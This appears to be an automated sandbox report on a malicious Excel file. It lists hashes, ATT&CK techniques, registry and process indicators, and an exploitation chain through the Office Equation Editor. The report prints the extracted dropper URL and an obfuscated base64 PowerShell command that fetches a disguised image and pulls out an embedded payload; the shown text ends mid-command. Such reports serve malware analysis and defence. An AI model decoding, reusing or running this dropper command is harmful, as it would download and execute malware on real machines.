e6ce3afaaaed3a333bd27710378607dbab0e662ce54de106e63621d44b15cf8d

Analysis

max time kernel
144s
max time network
120s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
22/08/2024, 02:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e6ce3afaaaed3a333bd27710378607dbab0e662ce54de106e63621d44b15cf8d.xls
Size

331KB
MD5

88683824dbd986b04614f87932b353e2
SHA1

2337105e97292f73355a9bec6ab557801291958a
SHA256

e6ce3afaaaed3a333bd27710378607dbab0e662ce54de106e63621d44b15cf8d
SHA512

51085d772bdcb96630a96ab549224b3acf93a60685df0ef33bc844a917e595df99ee6554fbbb28a611b2ea96a63aaf4a666fbeed9a14a987d5645c5f654a5d97
SSDEEP

6144:busFsN2M9GMzJexttr9+nkpJsJV5ehYxH/P1ljNGEMo:Ksg9GDtIkTynxf8Er

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	2876	EQNEDT32.EXE
17	2456	powershell.exe
18	2456	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2380	powershell.exe
2456	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\Common\Offline\Files\https://jamp.to/rB9GzE	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2876	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2548	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2380	powershell.exe
2456	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeShutdownPrivilege	2176	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2548	EXCEL.EXE
2548	EXCEL.EXE
2548	EXCEL.EXE
2176	WINWORD.EXE
2176	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 1664	2876	EQNEDT32.EXE	34
PID 2876 wrote to memory of 1664	2876	EQNEDT32.EXE	34
PID 2876 wrote to memory of 1664	2876	EQNEDT32.EXE	34
PID 2876 wrote to memory of 1664	2876	EQNEDT32.EXE	34
PID 2176 wrote to memory of 1256	2176	WINWORD.EXE	35
PID 2176 wrote to memory of 1256	2176	WINWORD.EXE	35
PID 2176 wrote to memory of 1256	2176	WINWORD.EXE	35
PID 2176 wrote to memory of 1256	2176	WINWORD.EXE	35
PID 1664 wrote to memory of 2380	1664	WScript.exe	36
PID 1664 wrote to memory of 2380	1664	WScript.exe	36
PID 1664 wrote to memory of 2380	1664	WScript.exe	36
PID 1664 wrote to memory of 2380	1664	WScript.exe	36
PID 2380 wrote to memory of 2456	2380	powershell.exe	38
PID 2380 wrote to memory of 2456	2380	powershell.exe	38
PID 2380 wrote to memory of 2456	2380	powershell.exe	38
PID 2380 wrote to memory of 2456	2380	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e6ce3afaaaed3a333bd27710378607dbab0e662ce54de106e63621d44b15cf8d.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2548

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1256

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mugcackecholocatebutterburnm.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J∽ ´ ⺴ ⎰ ⪤Bp∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤VQBy∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤9∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤JwBo∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bw∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤Og∽ ´ ⺴ ⎰ ⪤v∽ ´ ⺴ ⎰ ⪤C8∽ ´ ⺴ ⎰ ⪤aQBh∽ ´ ⺴ ⎰ ⪤Dg∽ ´ ⺴ ⎰ ⪤M∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤z∽ ´ ⺴ ⎰ ⪤DE∽ ´ ⺴ ⎰ ⪤M∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤0∽ ´ ⺴ ⎰ ⪤C4∽ ´ ⺴ ⎰ ⪤dQBz∽ ´ ⺴ ⎰ ⪤C4∽ ´ ⺴ ⎰ ⪤YQBy∽ ´ ⺴ ⎰ ⪤GM∽ ´ ⺴ ⎰ ⪤a∽ ´ ⺴ ⎰ ⪤Bp∽ ´ ⺴ ⎰ ⪤HY∽ ´ ⺴ ⎰ ⪤ZQ∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤G8∽ ´ ⺴ ⎰ ⪤cgBn∽ ´ ⺴ ⎰ ⪤C8∽ ´ ⺴ ⎰ ⪤Mg∽ ´ ⺴ ⎰ ⪤3∽ ´ ⺴ ⎰ ⪤C8∽ ´ ⺴ ⎰ ⪤aQB0∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bQBz∽ ´ ⺴ ⎰ ⪤C8∽ ´ ⺴ ⎰ ⪤dgBi∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤Xw∽ ´ ⺴ ⎰ ⪤y∽ ´ ⺴ ⎰ ⪤D∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤Mg∽ ´ ⺴ ⎰ ⪤0∽ ´ ⺴ ⎰ ⪤D∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤Nw∽ ´ ⺴ ⎰ ⪤y∽ ´ ⺴ ⎰ ⪤DY∽ ´ ⺴ ⎰ ⪤Xw∽ ´ ⺴ ⎰ ⪤y∽ ´ ⺴ ⎰ ⪤D∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤Mg∽ ´ ⺴ ⎰ ⪤0∽ ´ ⺴ ⎰ ⪤D∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤Nw∽ ´ ⺴ ⎰ ⪤y∽ ´ ⺴ ⎰ ⪤DY∽ ´ ⺴ ⎰ ⪤LwB2∽ ´ ⺴ ⎰ ⪤GI∽ ´ ⺴ ⎰ ⪤cw∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤Go∽ ´ ⺴ ⎰ ⪤c∽ ´ ⺴ ⎰ ⪤Bn∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤Ow∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤Hc∽ ´ ⺴ ⎰ ⪤ZQBi∽ ´ ⺴ ⎰ ⪤EM∽ ´ ⺴ ⎰ ⪤b∽ ´ ⺴ ⎰ ⪤Bp∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bgB0∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤PQ∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤E4∽ ´ ⺴ ⎰ ⪤ZQB3∽ ´ ⺴ ⎰ ⪤C0∽ ´ ⺴ ⎰ ⪤TwBi∽ ´ ⺴ ⎰ ⪤Go∽ ´ ⺴ ⎰ ⪤ZQBj∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤BT∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤cwB0∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bQ∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤E4∽ ´ ⺴ ⎰ ⪤ZQB0∽ ´ ⺴ ⎰ ⪤C4∽ ´ ⺴ ⎰ ⪤VwBl∽ ´ ⺴ ⎰ ⪤GI∽ ´ ⺴ ⎰ ⪤QwBs∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤ZQBu∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤Ow∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤bQBh∽ ´ ⺴ ⎰ ⪤Gc∽ ´ ⺴ ⎰ ⪤ZQBC∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤9∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤B3∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤YgBD∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤aQBl∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤EQ∽ ´ ⺴ ⎰ ⪤bwB3∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤b∽ ´ ⺴ ⎰ ⪤Bv∽ ´ ⺴ ⎰ ⪤GE∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤BE∽ ´ ⺴ ⎰ ⪤GE∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤Cg∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤Bp∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤VQBy∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤KQ∽ ´ ⺴ ⎰ ⪤7∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤aQBt∽ ´ ⺴ ⎰ ⪤GE∽ ´ ⺴ ⎰ ⪤ZwBl∽ ´ ⺴ ⎰ ⪤FQ∽ ´ ⺴ ⎰ ⪤ZQB4∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤9∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤WwBT∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤cwB0∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bQ∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤FQ∽ ´ ⺴ ⎰ ⪤ZQB4∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤LgBF∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤YwBv∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤aQBu∽ ´ ⺴ ⎰ ⪤Gc∽ ´ ⺴ ⎰ ⪤XQ∽ ´ ⺴ ⎰ ⪤6∽ ´ ⺴ ⎰ ⪤Do∽ ´ ⺴ ⎰ ⪤VQBU∽ ´ ⺴ ⎰ ⪤EY∽ ´ ⺴ ⎰ ⪤O∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤Ec∽ ´ ⺴ ⎰ ⪤ZQB0∽ ´ ⺴ ⎰ ⪤FM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤By∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤bgBn∽ ´ ⺴ ⎰ ⪤Cg∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤Bp∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤QgB5∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤ZQBz∽ ´ ⺴ ⎰ ⪤Ck∽ ´ ⺴ ⎰ ⪤Ow∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BG∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤PQ∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤P∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤8∽ ´ ⺴ ⎰ ⪤EI∽ ´ ⺴ ⎰ ⪤QQBT∽ ´ ⺴ ⎰ ⪤EU∽ ´ ⺴ ⎰ ⪤Ng∽ ´ ⺴ ⎰ ⪤0∽ ´ ⺴ ⎰ ⪤F8∽ ´ ⺴ ⎰ ⪤UwBU∽ ´ ⺴ ⎰ ⪤EE∽ ´ ⺴ ⎰ ⪤UgBU∽ ´ ⺴ ⎰ ⪤D4∽ ´ ⺴ ⎰ ⪤Pg∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤Ds∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤BG∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤PQ∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤P∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤8∽ ´ ⺴ ⎰ ⪤EI∽ ´ ⺴ ⎰ ⪤QQBT∽ ´ ⺴ ⎰ ⪤EU∽ ´ ⺴ ⎰ ⪤Ng∽ ´ ⺴ ⎰ ⪤0∽ ´ ⺴ ⎰ ⪤F8∽ ´ ⺴ ⎰ ⪤RQBO∽ ´ ⺴ ⎰ ⪤EQ∽ ´ ⺴ ⎰ ⪤Pg∽ ´ ⺴ ⎰ ⪤+∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤Ow∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BJ∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤Hg∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤9∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤Bp∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤V∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤Hg∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤Ek∽ ´ ⺴ ⎰ ⪤bgBk∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤e∽ ´ ⺴ ⎰ ⪤BP∽ ´ ⺴ ⎰ ⪤GY∽ ´ ⺴ ⎰ ⪤K∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BG∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤Ck∽ ´ ⺴ ⎰ ⪤Ow∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bgBk∽ ´ ⺴ ⎰ ⪤Ek∽ ´ ⺴ ⎰ ⪤bgBk∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤e∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤D0∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤bQBh∽ ´ ⺴ ⎰ ⪤Gc∽ ´ ⺴ ⎰ ⪤ZQBU∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤e∽ ´ ⺴ ⎰ ⪤B0∽ ´ ⺴ ⎰ ⪤C4∽ ´ ⺴ ⎰ ⪤SQBu∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤ZQB4∽ ´ ⺴ ⎰ ⪤E8∽ ´ ⺴ ⎰ ⪤Zg∽ ´ ⺴ ⎰ ⪤o∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤ZQBu∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤RgBs∽ ´ ⺴ ⎰ ⪤GE∽ ´ ⺴ ⎰ ⪤Zw∽ ´ ⺴ ⎰ ⪤p∽ ´ ⺴ ⎰ ⪤Ds∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤Bz∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤YQBy∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤SQBu∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤ZQB4∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤LQBn∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤w∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤LQBh∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤ZQBu∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤SQBu∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤ZQB4∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤LQBn∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BJ∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤Hg∽ ´ ⺴ ⎰ ⪤Ow∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BJ∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤Hg∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤r∽ ´ ⺴ ⎰ ⪤D0∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BG∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤YQBn∽ ´ ⺴ ⎰ ⪤C4∽ ´ ⺴ ⎰ ⪤T∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤ZwB0∽ ´ ⺴ ⎰ ⪤Gg∽ ´ ⺴ ⎰ ⪤Ow∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤GI∽ ´ ⺴ ⎰ ⪤YQBz∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤Ng∽ ´ ⺴ ⎰ ⪤0∽ ´ ⺴ ⎰ ⪤Ew∽ ´ ⺴ ⎰ ⪤ZQBu∽ ´ ⺴ ⎰ ⪤Gc∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bo∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤PQ∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤ZQBu∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤SQBu∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤ZQB4∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤LQ∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤cwB0∽ ´ ⺴ ⎰ ⪤GE∽ ´ ⺴ ⎰ ⪤cgB0∽ ´ ⺴ ⎰ ⪤Ek∽ ´ ⺴ ⎰ ⪤bgBk∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤e∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤7∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤YgBh∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤ZQ∽ ´ ⺴ ⎰ ⪤2∽ ´ ⺴ ⎰ ⪤DQ∽ ´ ⺴ ⎰ ⪤QwBv∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤bQBh∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤D0∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤bQBh∽ ´ ⺴ ⎰ ⪤Gc∽ ´ ⺴ ⎰ ⪤ZQBU∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤e∽ ´ ⺴ ⎰ ⪤B0∽ ´ ⺴ ⎰ ⪤C4∽ ´ ⺴ ⎰ ⪤UwB1∽ ´ ⺴ ⎰ ⪤GI∽ ´ ⺴ ⎰ ⪤cwB0∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤aQBu∽ ´ ⺴ ⎰ ⪤Gc∽ ´ ⺴ ⎰ ⪤K∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bh∽ ´ ⺴ ⎰ ⪤HI∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BJ∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤Hg∽ ´ ⺴ ⎰ ⪤L∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤YgBh∽ ´ ⺴ ⎰ 